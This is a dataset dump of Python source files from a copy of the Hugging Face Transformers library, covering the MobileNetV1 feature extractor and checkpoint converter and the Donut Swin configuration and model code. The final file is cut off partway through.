repo_id stringlengths 6 101 | size int64 367 5.14M | file_path stringlengths 2 269 | content stringlengths 367 5.14M |
|---|---|---|---|
27182812/ChatGLM-LLaMA-chinese-insturct | 1,222 | src/transformers/models/mobilenet_v1/feature_extraction_mobilenet_v1.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Feature extractor class for MobileNetV1."""
import warnings
from ...utils import logging
from .image_processing_mobilenet_v1 import MobileNetV1ImageProcessor
logger = logging.get_logger(__name__)
class MobileNetV1FeatureExtractor(MobileNetV1ImageProcessor):
def __init__(self, *args, **kwargs) -> None:
warnings.warn(
"The class MobileNetV1FeatureExtractor is deprecated and will be removed in version 5 of Transformers."
" Please use MobileNetV1ImageProcessor instead.",
FutureWarning,
)
super().__init__(*args, **kwargs)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 4,942 | src/transformers/models/mobilenet_v1/convert_original_tf_checkpoint_to_pytorch.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Convert MobileNetV1 checkpoints from the tensorflow/models library."""
import argparse
import json
import re
from pathlib import Path
import requests
import torch
from huggingface_hub import hf_hub_download
from PIL import Image
from transformers import (
MobileNetV1Config,
MobileNetV1FeatureExtractor,
MobileNetV1ForImageClassification,
load_tf_weights_in_mobilenet_v1,
)
from transformers.utils import logging
logging.set_verbosity_info()
logger = logging.get_logger(__name__)
def get_mobilenet_v1_config(model_name):
config = MobileNetV1Config(layer_norm_eps=0.001)
if "_quant" in model_name:
raise ValueError("Quantized models are not supported.")
matches = re.match(r"^mobilenet_v1_([^_]*)_([^_]*)$", model_name)
if matches:
config.depth_multiplier = float(matches[1])
config.image_size = int(matches[2])
# The TensorFlow version of MobileNetV1 predicts 1001 classes instead of
# the usual 1000. The first class (index 0) is "background".
config.num_labels = 1001
filename = "imagenet-1k-id2label.json"
repo_id = "huggingface/label-files"
id2label = json.load(open(hf_hub_download(repo_id, filename, repo_type="dataset"), "r"))
id2label = {int(k) + 1: v for k, v in id2label.items()}
id2label[0] = "background"
config.id2label = id2label
config.label2id = {v: k for k, v in id2label.items()}
return config
# We will verify our results on an image of cute cats
def prepare_img():
url = "http://images.cocodataset.org/val2017/000000039769.jpg"
im = Image.open(requests.get(url, stream=True).raw)
return im
@torch.no_grad()
def convert_movilevit_checkpoint(model_name, checkpoint_path, pytorch_dump_folder_path, push_to_hub=False):
"""
Copy/paste/tweak model's weights to our MobileNetV1 structure.
"""
config = get_mobilenet_v1_config(model_name)
# Load 🤗 model
model = MobileNetV1ForImageClassification(config).eval()
# Load weights from TensorFlow checkpoint
load_tf_weights_in_mobilenet_v1(model, config, checkpoint_path)
# Check outputs on an image, prepared by MobileNetV1FeatureExtractor
feature_extractor = MobileNetV1FeatureExtractor(
crop_size={"width": config.image_size, "height": config.image_size},
size={"shortest_edge": config.image_size + 32},
)
encoding = feature_extractor(images=prepare_img(), return_tensors="pt")
outputs = model(**encoding)
logits = outputs.logits
assert logits.shape == (1, 1001)
if model_name == "mobilenet_v1_1.0_224":
expected_logits = torch.tensor([-4.1739, -1.1233, 3.1205])
elif model_name == "mobilenet_v1_0.75_192":
expected_logits = torch.tensor([-3.9440, -2.3141, -0.3333])
else:
expected_logits = None
if expected_logits is not None:
assert torch.allclose(logits[0, :3], expected_logits, atol=1e-4)
Path(pytorch_dump_folder_path).mkdir(exist_ok=True)
print(f"Saving model {model_name} to {pytorch_dump_folder_path}")
model.save_pretrained(pytorch_dump_folder_path)
print(f"Saving feature extractor to {pytorch_dump_folder_path}")
feature_extractor.save_pretrained(pytorch_dump_folder_path)
if push_to_hub:
print("Pushing to the hub...")
repo_id = "google/" + model_name
feature_extractor.push_to_hub(repo_id)
model.push_to_hub(repo_id)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# Required parameters
parser.add_argument(
"--model_name",
default="mobilenet_v1_1.0_224",
type=str,
help="Name of the MobileNetV1 model you'd like to convert. Should in the form 'mobilenet_v1_<depth>_<size>'.",
)
parser.add_argument(
"--checkpoint_path", required=True, type=str, help="Path to the original TensorFlow checkpoint (.ckpt file)."
)
parser.add_argument(
"--pytorch_dump_folder_path", required=True, type=str, help="Path to the output PyTorch model directory."
)
parser.add_argument(
"--push_to_hub", action="store_true", help="Whether or not to push the converted model to the 🤗 hub."
)
args = parser.parse_args()
convert_movilevit_checkpoint(
args.model_name, args.checkpoint_path, args.pytorch_dump_folder_path, args.push_to_hub
)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 2,455 | src/transformers/models/donut/__init__.py | # Copyright 2022 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...utils import OptionalDependencyNotAvailable, _LazyModule, is_torch_available, is_vision_available
_import_structure = {
"configuration_donut_swin": ["DONUT_SWIN_PRETRAINED_CONFIG_ARCHIVE_MAP", "DonutSwinConfig"],
"processing_donut": ["DonutProcessor"],
}
try:
if not is_torch_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
_import_structure["modeling_donut_swin"] = [
"DONUT_SWIN_PRETRAINED_MODEL_ARCHIVE_LIST",
"DonutSwinModel",
"DonutSwinPreTrainedModel",
]
try:
if not is_vision_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
_import_structure["feature_extraction_donut"] = ["DonutFeatureExtractor"]
_import_structure["image_processing_donut"] = ["DonutImageProcessor"]
if TYPE_CHECKING:
from .configuration_donut_swin import DONUT_SWIN_PRETRAINED_CONFIG_ARCHIVE_MAP, DonutSwinConfig
from .processing_donut import DonutProcessor
try:
if not is_torch_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
from .modeling_donut_swin import (
DONUT_SWIN_PRETRAINED_MODEL_ARCHIVE_LIST,
DonutSwinModel,
DonutSwinPreTrainedModel,
)
try:
if not is_vision_available():
raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
pass
else:
from .feature_extraction_donut import DonutFeatureExtractor
from .image_processing_donut import DonutImageProcessor
else:
import sys
sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure, module_spec=__spec__)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 5,981 | src/transformers/models/donut/configuration_donut_swin.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Donut Swin Transformer model configuration"""
from ...configuration_utils import PretrainedConfig
from ...utils import logging
logger = logging.get_logger(__name__)
DONUT_SWIN_PRETRAINED_CONFIG_ARCHIVE_MAP = {
"naver-clova-ix/donut-base": "https://huggingface.co/naver-clova-ix/donut-base/resolve/main/config.json",
# See all Donut models at https://huggingface.co/models?filter=donut-swin
}
class DonutSwinConfig(PretrainedConfig):
r"""
This is the configuration class to store the configuration of a [`DonutSwinModel`]. It is used to instantiate a
Donut model according to the specified arguments, defining the model architecture. Instantiating a configuration
with the defaults will yield a similar configuration to that of the Donut
[naver-clova-ix/donut-base](https://huggingface.co/naver-clova-ix/donut-base) architecture.
Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
documentation from [`PretrainedConfig`] for more information.
Args:
image_size (`int`, *optional*, defaults to 224):
The size (resolution) of each image.
patch_size (`int`, *optional*, defaults to 4):
The size (resolution) of each patch.
num_channels (`int`, *optional*, defaults to 3):
The number of input channels.
embed_dim (`int`, *optional*, defaults to 96):
Dimensionality of patch embedding.
depths (`list(int)`, *optional*, defaults to [2, 2, 6, 2]):
Depth of each layer in the Transformer encoder.
num_heads (`list(int)`, *optional*, defaults to [3, 6, 12, 24]):
Number of attention heads in each layer of the Transformer encoder.
window_size (`int`, *optional*, defaults to 7):
Size of windows.
mlp_ratio (`float`, *optional*, defaults to 4.0):
Ratio of MLP hidden dimensionality to embedding dimensionality.
qkv_bias (`bool`, *optional*, defaults to True):
Whether or not a learnable bias should be added to the queries, keys and values.
hidden_dropout_prob (`float`, *optional*, defaults to 0.0):
The dropout probability for all fully connected layers in the embeddings and encoder.
attention_probs_dropout_prob (`float`, *optional*, defaults to 0.0):
The dropout ratio for the attention probabilities.
drop_path_rate (`float`, *optional*, defaults to 0.1):
Stochastic depth rate.
hidden_act (`str` or `function`, *optional*, defaults to `"gelu"`):
The non-linear activation function (function or string) in the encoder. If string, `"gelu"`, `"relu"`,
`"selu"` and `"gelu_new"` are supported.
use_absolute_embeddings (`bool`, *optional*, defaults to False):
Whether or not to add absolute position embeddings to the patch embeddings.
initializer_range (`float`, *optional*, defaults to 0.02):
The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
layer_norm_eps (`float`, *optional*, defaults to 1e-12):
The epsilon used by the layer normalization layers.
Example:
```python
>>> from transformers import DonutSwinConfig, DonutSwinModel
>>> # Initializing a Donut naver-clova-ix/donut-base style configuration
>>> configuration = DonutSwinConfig()
>>> # Randomly initializing a model from the naver-clova-ix/donut-base style configuration
>>> model = DonutSwinModel(configuration)
>>> # Accessing the model configuration
>>> configuration = model.config
```"""
model_type = "donut-swin"
attribute_map = {
"num_attention_heads": "num_heads",
"num_hidden_layers": "num_layers",
}
def __init__(
self,
image_size=224,
patch_size=4,
num_channels=3,
embed_dim=96,
depths=[2, 2, 6, 2],
num_heads=[3, 6, 12, 24],
window_size=7,
mlp_ratio=4.0,
qkv_bias=True,
hidden_dropout_prob=0.0,
attention_probs_dropout_prob=0.0,
drop_path_rate=0.1,
hidden_act="gelu",
use_absolute_embeddings=False,
initializer_range=0.02,
layer_norm_eps=1e-5,
**kwargs,
):
super().__init__(**kwargs)
self.image_size = image_size
self.patch_size = patch_size
self.num_channels = num_channels
self.embed_dim = embed_dim
self.depths = depths
self.num_layers = len(depths)
self.num_heads = num_heads
self.window_size = window_size
self.mlp_ratio = mlp_ratio
self.qkv_bias = qkv_bias
self.hidden_dropout_prob = hidden_dropout_prob
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.drop_path_rate = drop_path_rate
self.hidden_act = hidden_act
self.use_absolute_embeddings = use_absolute_embeddings
self.layer_norm_eps = layer_norm_eps
self.initializer_range = initializer_range
# we set the hidden_size attribute in order to make Swin work with VisionEncoderDecoderModel
# this indicates the channel dimension after the last stage of the model
self.hidden_size = int(embed_dim * 2 ** (len(depths) - 1))
|
27182812/ChatGLM-LLaMA-chinese-insturct | 43,502 | src/transformers/models/donut/modeling_donut_swin.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch Donut Swin Transformer model.
This implementation is identical to a regular Swin Transformer, without final layer norm on top of the final hidden
states."""
import collections.abc
import math
from dataclasses import dataclass
from typing import Optional, Tuple, Union
import torch
import torch.utils.checkpoint
from torch import nn
from ...activations import ACT2FN
from ...modeling_utils import PreTrainedModel
from ...pytorch_utils import find_pruneable_heads_and_indices, meshgrid, prune_linear_layer
from ...utils import (
ModelOutput,
add_code_sample_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
logging,
)
from .configuration_donut_swin import DonutSwinConfig
logger = logging.get_logger(__name__)
# General docstring
_CONFIG_FOR_DOC = "DonutSwinConfig"
# Base docstring
_CHECKPOINT_FOR_DOC = "https://huggingface.co/naver-clova-ix/donut-base"
_EXPECTED_OUTPUT_SHAPE = [1, 49, 768]
DONUT_SWIN_PRETRAINED_MODEL_ARCHIVE_LIST = [
"naver-clova-ix/donut-base",
# See all Donut Swin models at https://huggingface.co/models?filter=donut
]
@dataclass
# Copied from transformers.models.swin.modeling_swin.SwinEncoderOutput with Swin->DonutSwin
class DonutSwinEncoderOutput(ModelOutput):
"""
DonutSwin encoder's outputs, with potential hidden states and attentions.
Args:
last_hidden_state (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`):
Sequence of hidden-states at the output of the last layer of the model.
hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each stage) of
shape `(batch_size, sequence_length, hidden_size)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
Tuple of `torch.FloatTensor` (one for each stage) of shape `(batch_size, num_heads, sequence_length,
sequence_length)`.
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
heads.
reshaped_hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each stage) of
shape `(batch_size, hidden_size, height, width)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs reshaped to
include the spatial dimensions.
"""
last_hidden_state: torch.FloatTensor = None
hidden_states: Optional[Tuple[torch.FloatTensor]] = None
attentions: Optional[Tuple[torch.FloatTensor]] = None
reshaped_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
@dataclass
# Copied from transformers.models.swin.modeling_swin.SwinModelOutput with Swin->DonutSwin
class DonutSwinModelOutput(ModelOutput):
"""
DonutSwin model's outputs that also contains a pooling of the last hidden states.
Args:
last_hidden_state (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`):
Sequence of hidden-states at the output of the last layer of the model.
pooler_output (`torch.FloatTensor` of shape `(batch_size, hidden_size)`, *optional*, returned when `add_pooling_layer=True` is passed):
Average pooling of the last layer hidden-state.
hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each stage) of
shape `(batch_size, sequence_length, hidden_size)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
Tuple of `torch.FloatTensor` (one for each stage) of shape `(batch_size, num_heads, sequence_length,
sequence_length)`.
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
heads.
reshaped_hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each stage) of
shape `(batch_size, hidden_size, height, width)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs reshaped to
include the spatial dimensions.
"""
last_hidden_state: torch.FloatTensor = None
pooler_output: Optional[torch.FloatTensor] = None
hidden_states: Optional[Tuple[torch.FloatTensor]] = None
attentions: Optional[Tuple[torch.FloatTensor]] = None
reshaped_hidden_states: Optional[Tuple[torch.FloatTensor]] = None
# Copied from transformers.models.swin.modeling_swin.window_partition
def window_partition(input_feature, window_size):
"""
Partitions the given input into windows.
"""
batch_size, height, width, num_channels = input_feature.shape
input_feature = input_feature.view(
batch_size, height // window_size, window_size, width // window_size, window_size, num_channels
)
windows = input_feature.permute(0, 1, 3, 2, 4, 5).contiguous().view(-1, window_size, window_size, num_channels)
return windows
# Copied from transformers.models.swin.modeling_swin.window_reverse
def window_reverse(windows, window_size, height, width):
"""
Merges windows to produce higher resolution features.
"""
num_channels = windows.shape[-1]
windows = windows.view(-1, height // window_size, width // window_size, window_size, window_size, num_channels)
windows = windows.permute(0, 1, 3, 2, 4, 5).contiguous().view(-1, height, width, num_channels)
return windows
# Copied from transformers.models.swin.modeling_swin.SwinEmbeddings with Swin->DonutSwin
class DonutSwinEmbeddings(nn.Module):
"""
Construct the patch and position embeddings. Optionally, also the mask token.
"""
def __init__(self, config, use_mask_token=False):
super().__init__()
self.patch_embeddings = DonutSwinPatchEmbeddings(config)
num_patches = self.patch_embeddings.num_patches
self.patch_grid = self.patch_embeddings.grid_size
self.mask_token = nn.Parameter(torch.zeros(1, 1, config.embed_dim)) if use_mask_token else None
if config.use_absolute_embeddings:
self.position_embeddings = nn.Parameter(torch.zeros(1, num_patches + 1, config.embed_dim))
else:
self.position_embeddings = None
self.norm = nn.LayerNorm(config.embed_dim)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(
self, pixel_values: Optional[torch.FloatTensor], bool_masked_pos: Optional[torch.BoolTensor] = None
) -> Tuple[torch.Tensor]:
embeddings, output_dimensions = self.patch_embeddings(pixel_values)
embeddings = self.norm(embeddings)
batch_size, seq_len, _ = embeddings.size()
if bool_masked_pos is not None:
mask_tokens = self.mask_token.expand(batch_size, seq_len, -1)
# replace the masked visual tokens by mask_tokens
mask = bool_masked_pos.unsqueeze(-1).type_as(mask_tokens)
embeddings = embeddings * (1.0 - mask) + mask_tokens * mask
if self.position_embeddings is not None:
embeddings = embeddings + self.position_embeddings
embeddings = self.dropout(embeddings)
return embeddings, output_dimensions
# Copied from transformers.models.swin.modeling_swin.SwinPatchEmbeddings
class DonutSwinPatchEmbeddings(nn.Module):
"""
This class turns `pixel_values` of shape `(batch_size, num_channels, height, width)` into the initial
`hidden_states` (patch embeddings) of shape `(batch_size, seq_length, hidden_size)` to be consumed by a
Transformer.
"""
def __init__(self, config):
super().__init__()
image_size, patch_size = config.image_size, config.patch_size
num_channels, hidden_size = config.num_channels, config.embed_dim
image_size = image_size if isinstance(image_size, collections.abc.Iterable) else (image_size, image_size)
patch_size = patch_size if isinstance(patch_size, collections.abc.Iterable) else (patch_size, patch_size)
num_patches = (image_size[1] // patch_size[1]) * (image_size[0] // patch_size[0])
self.image_size = image_size
self.patch_size = patch_size
self.num_channels = num_channels
self.num_patches = num_patches
self.grid_size = (image_size[0] // patch_size[0], image_size[1] // patch_size[1])
self.projection = nn.Conv2d(num_channels, hidden_size, kernel_size=patch_size, stride=patch_size)
def maybe_pad(self, pixel_values, height, width):
if width % self.patch_size[1] != 0:
pad_values = (0, self.patch_size[1] - width % self.patch_size[1])
pixel_values = nn.functional.pad(pixel_values, pad_values)
if height % self.patch_size[0] != 0:
pad_values = (0, 0, 0, self.patch_size[0] - height % self.patch_size[0])
pixel_values = nn.functional.pad(pixel_values, pad_values)
return pixel_values
def forward(self, pixel_values: Optional[torch.FloatTensor]) -> Tuple[torch.Tensor, Tuple[int]]:
_, num_channels, height, width = pixel_values.shape
if num_channels != self.num_channels:
raise ValueError(
"Make sure that the channel dimension of the pixel values match with the one set in the configuration."
)
# pad the input to be divisible by self.patch_size, if needed
pixel_values = self.maybe_pad(pixel_values, height, width)
embeddings = self.projection(pixel_values)
_, _, height, width = embeddings.shape
output_dimensions = (height, width)
embeddings = embeddings.flatten(2).transpose(1, 2)
return embeddings, output_dimensions
# Copied from transformers.models.swin.modeling_swin.SwinPatchMerging
class DonutSwinPatchMerging(nn.Module):
"""
Patch Merging Layer.
Args:
input_resolution (`Tuple[int]`):
Resolution of input feature.
dim (`int`):
Number of input channels.
norm_layer (`nn.Module`, *optional*, defaults to `nn.LayerNorm`):
Normalization layer class.
"""
def __init__(self, input_resolution: Tuple[int], dim: int, norm_layer: nn.Module = nn.LayerNorm) -> None:
super().__init__()
self.input_resolution = input_resolution
self.dim = dim
self.reduction = nn.Linear(4 * dim, 2 * dim, bias=False)
self.norm = norm_layer(4 * dim)
def maybe_pad(self, input_feature, height, width):
should_pad = (height % 2 == 1) or (width % 2 == 1)
if should_pad:
pad_values = (0, 0, 0, width % 2, 0, height % 2)
input_feature = nn.functional.pad(input_feature, pad_values)
return input_feature
def forward(self, input_feature: torch.Tensor, input_dimensions: Tuple[int, int]) -> torch.Tensor:
height, width = input_dimensions
# `dim` is height * width
batch_size, dim, num_channels = input_feature.shape
input_feature = input_feature.view(batch_size, height, width, num_channels)
# pad input to be disible by width and height, if needed
input_feature = self.maybe_pad(input_feature, height, width)
# [batch_size, height/2, width/2, num_channels]
input_feature_0 = input_feature[:, 0::2, 0::2, :]
# [batch_size, height/2, width/2, num_channels]
input_feature_1 = input_feature[:, 1::2, 0::2, :]
# [batch_size, height/2, width/2, num_channels]
input_feature_2 = input_feature[:, 0::2, 1::2, :]
# [batch_size, height/2, width/2, num_channels]
input_feature_3 = input_feature[:, 1::2, 1::2, :]
# batch_size height/2 width/2 4*num_channels
input_feature = torch.cat([input_feature_0, input_feature_1, input_feature_2, input_feature_3], -1)
input_feature = input_feature.view(batch_size, -1, 4 * num_channels) # batch_size height/2*width/2 4*C
input_feature = self.norm(input_feature)
input_feature = self.reduction(input_feature)
return input_feature
# Copied from transformers.models.swin.modeling_swin.drop_path
def drop_path(input, drop_prob=0.0, training=False, scale_by_keep=True):
"""
Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).
Comment by Ross Wightman: This is the same as the DropConnect impl I created for EfficientNet, etc networks,
however, the original name is misleading as 'Drop Connect' is a different form of dropout in a separate paper...
See discussion: https://github.com/tensorflow/tpu/issues/494#issuecomment-532968956 ... I've opted for changing the
layer and argument names to 'drop path' rather than mix DropConnect as a layer name and use 'survival rate' as the
argument.
"""
if drop_prob == 0.0 or not training:
return input
keep_prob = 1 - drop_prob
shape = (input.shape[0],) + (1,) * (input.ndim - 1) # work with diff dim tensors, not just 2D ConvNets
random_tensor = keep_prob + torch.rand(shape, dtype=input.dtype, device=input.device)
random_tensor.floor_() # binarize
output = input.div(keep_prob) * random_tensor
return output
# Copied from transformers.models.swin.modeling_swin.SwinDropPath
class DonutSwinDropPath(nn.Module):
"""Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks)."""
def __init__(self, drop_prob: Optional[float] = None) -> None:
super().__init__()
self.drop_prob = drop_prob
def forward(self, hidden_states: torch.Tensor) -> torch.Tensor:
return drop_path(hidden_states, self.drop_prob, self.training)
def extra_repr(self) -> str:
return "p={}".format(self.drop_prob)
# Copied from transformers.models.swin.modeling_swin.SwinSelfAttention with Swin->DonutSwin
class DonutSwinSelfAttention(nn.Module):
def __init__(self, config, dim, num_heads, window_size):
super().__init__()
if dim % num_heads != 0:
raise ValueError(
f"The hidden size ({dim}) is not a multiple of the number of attention heads ({num_heads})"
)
self.num_attention_heads = num_heads
self.attention_head_size = int(dim / num_heads)
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.window_size = (
window_size if isinstance(window_size, collections.abc.Iterable) else (window_size, window_size)
)
self.relative_position_bias_table = nn.Parameter(
torch.zeros((2 * self.window_size[0] - 1) * (2 * self.window_size[1] - 1), num_heads)
)
# get pair-wise relative position index for each token inside the window
coords_h = torch.arange(self.window_size[0])
coords_w = torch.arange(self.window_size[1])
coords = torch.stack(meshgrid([coords_h, coords_w], indexing="ij"))
coords_flatten = torch.flatten(coords, 1)
relative_coords = coords_flatten[:, :, None] - coords_flatten[:, None, :]
relative_coords = relative_coords.permute(1, 2, 0).contiguous()
relative_coords[:, :, 0] += self.window_size[0] - 1
relative_coords[:, :, 1] += self.window_size[1] - 1
relative_coords[:, :, 0] *= 2 * self.window_size[1] - 1
relative_position_index = relative_coords.sum(-1)
self.register_buffer("relative_position_index", relative_position_index)
self.query = nn.Linear(self.all_head_size, self.all_head_size, bias=config.qkv_bias)
self.key = nn.Linear(self.all_head_size, self.all_head_size, bias=config.qkv_bias)
self.value = nn.Linear(self.all_head_size, self.all_head_size, bias=config.qkv_bias)
self.dropout = nn.Dropout(config.attention_probs_dropout_prob)
def transpose_for_scores(self, x):
new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
x = x.view(new_x_shape)
return x.permute(0, 2, 1, 3)
def forward(
self,
hidden_states: torch.Tensor,
attention_mask: Optional[torch.FloatTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
output_attentions: Optional[bool] = False,
) -> Tuple[torch.Tensor]:
batch_size, dim, num_channels = hidden_states.shape
mixed_query_layer = self.query(hidden_states)
key_layer = self.transpose_for_scores(self.key(hidden_states))
value_layer = self.transpose_for_scores(self.value(hidden_states))
query_layer = self.transpose_for_scores(mixed_query_layer)
# Take the dot product between "query" and "key" to get the raw attention scores.
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
attention_scores = attention_scores / math.sqrt(self.attention_head_size)
relative_position_bias = self.relative_position_bias_table[self.relative_position_index.view(-1)]
relative_position_bias = relative_position_bias.view(
self.window_size[0] * self.window_size[1], self.window_size[0] * self.window_size[1], -1
)
relative_position_bias = relative_position_bias.permute(2, 0, 1).contiguous()
attention_scores = attention_scores + relative_position_bias.unsqueeze(0)
if attention_mask is not None:
# Apply the attention mask is (precomputed for all layers in DonutSwinModel forward() function)
mask_shape = attention_mask.shape[0]
attention_scores = attention_scores.view(
batch_size // mask_shape, mask_shape, self.num_attention_heads, dim, dim
)
attention_scores = attention_scores + attention_mask.unsqueeze(1).unsqueeze(0)
attention_scores = attention_scores.view(-1, self.num_attention_heads, dim, dim)
# Normalize the attention scores to probabilities.
attention_probs = nn.functional.softmax(attention_scores, dim=-1)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = self.dropout(attention_probs)
# Mask heads if we want to
if head_mask is not None:
attention_probs = attention_probs * head_mask
context_layer = torch.matmul(attention_probs, value_layer)
context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
context_layer = context_layer.view(new_context_layer_shape)
outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)
return outputs
# Copied from transformers.models.swin.modeling_swin.SwinSelfOutput
class DonutSwinSelfOutput(nn.Module):
def __init__(self, config, dim):
super().__init__()
self.dense = nn.Linear(dim, dim)
self.dropout = nn.Dropout(config.attention_probs_dropout_prob)
def forward(self, hidden_states: torch.Tensor, input_tensor: torch.Tensor) -> torch.Tensor:
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
return hidden_states
# Copied from transformers.models.swin.modeling_swin.SwinAttention with Swin->DonutSwin
class DonutSwinAttention(nn.Module):
def __init__(self, config, dim, num_heads, window_size):
super().__init__()
self.self = DonutSwinSelfAttention(config, dim, num_heads, window_size)
self.output = DonutSwinSelfOutput(config, dim)
self.pruned_heads = set()
def prune_heads(self, heads):
if len(heads) == 0:
return
heads, index = find_pruneable_heads_and_indices(
heads, self.self.num_attention_heads, self.self.attention_head_size, self.pruned_heads
)
# Prune linear layers
self.self.query = prune_linear_layer(self.self.query, index)
self.self.key = prune_linear_layer(self.self.key, index)
self.self.value = prune_linear_layer(self.self.value, index)
self.output.dense = prune_linear_layer(self.output.dense, index, dim=1)
# Update hyper params and store pruned heads
self.self.num_attention_heads = self.self.num_attention_heads - len(heads)
self.self.all_head_size = self.self.attention_head_size * self.self.num_attention_heads
self.pruned_heads = self.pruned_heads.union(heads)
def forward(
self,
hidden_states: torch.Tensor,
attention_mask: Optional[torch.FloatTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
output_attentions: Optional[bool] = False,
) -> Tuple[torch.Tensor]:
self_outputs = self.self(hidden_states, attention_mask, head_mask, output_attentions)
attention_output = self.output(self_outputs[0], hidden_states)
outputs = (attention_output,) + self_outputs[1:] # add attentions if we output them
return outputs
# Copied from transformers.models.swin.modeling_swin.SwinIntermediate
class DonutSwinIntermediate(nn.Module):
def __init__(self, config, dim):
super().__init__()
self.dense = nn.Linear(dim, int(config.mlp_ratio * dim))
if isinstance(config.hidden_act, str):
self.intermediate_act_fn = ACT2FN[config.hidden_act]
else:
self.intermediate_act_fn = config.hidden_act
def forward(self, hidden_states: torch.Tensor) -> torch.Tensor:
hidden_states = self.dense(hidden_states)
hidden_states = self.intermediate_act_fn(hidden_states)
return hidden_states
# Copied from transformers.models.swin.modeling_swin.SwinOutput
class DonutSwinOutput(nn.Module):
def __init__(self, config, dim):
super().__init__()
self.dense = nn.Linear(int(config.mlp_ratio * dim), dim)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, hidden_states: torch.Tensor) -> torch.Tensor:
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
return hidden_states
# Copied from transformers.models.swin.modeling_swin.SwinLayer with Swin->DonutSwin
